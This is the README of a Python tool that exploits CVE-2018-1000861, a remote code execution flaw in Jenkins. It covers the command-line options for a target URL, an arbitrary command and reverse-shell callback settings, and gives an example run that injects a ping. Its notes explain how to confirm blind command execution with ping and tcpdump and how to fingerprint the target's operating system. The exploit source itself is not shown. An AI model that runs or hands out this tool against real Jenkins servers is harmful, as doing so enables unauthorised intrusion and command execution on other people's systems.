CVE-2018-1000861 Exploit# CVE-2018-1000861
Simple script to exploit CVE-2018-1000861, written in Python 3
<p>
### Usage:
```
usage: exploit.py [-h] -u URL [-c CMD] [-r] [-i IP] [-p PORT] [-v]
options:
-h, --help show this help message and exit
-u URL, --url URL Target Jenkins server
-c CMD, --cmd CMD Command to execute
-r, --revshell Execute reverse shell
-i IP, --ip IP IP address for reverse shell callback
-p PORT, --port PORT Port for reverse shell callback
-v, --verbose Verbose output
```
<p>
### Ex:
```
python exploit.py -u http://192.168.1.20 -c 'ping 192.168.1.10'
```
<p>
### Notes:
- This tool does not attempt to verify the target is vulnerable. All it does is shove a shell command into a Java class.
- Shell commands executed will not return output. You'll need to either have method of verifying the command execute (ie ping + tcpdump) or use a reverse shell
- This vulnerability affects both Linux and Windows installs of Jenkins where the . You should attempt to verify target OS prior to executing this (such as through ICMP TTL or available services)
- The script *should* work for both Linux and Windows
- reverse shell module (`-r`, `-i`, `p` options) aren't implemented
- Use responsibly
<p>
### TODO:
- [ ] Platform specific reverse shell modules
- [ ] Vuln identification
- [ ] Verbosity with vuln identification
### Refs:
- Credit to [Orange Tsai](https://twitter.com/orange_8361)
- https://github.com/orangetw/awesome-jenkins-rce-2019
- https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
- https://twitter.com/orange_8361/status/1075492505657925632
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view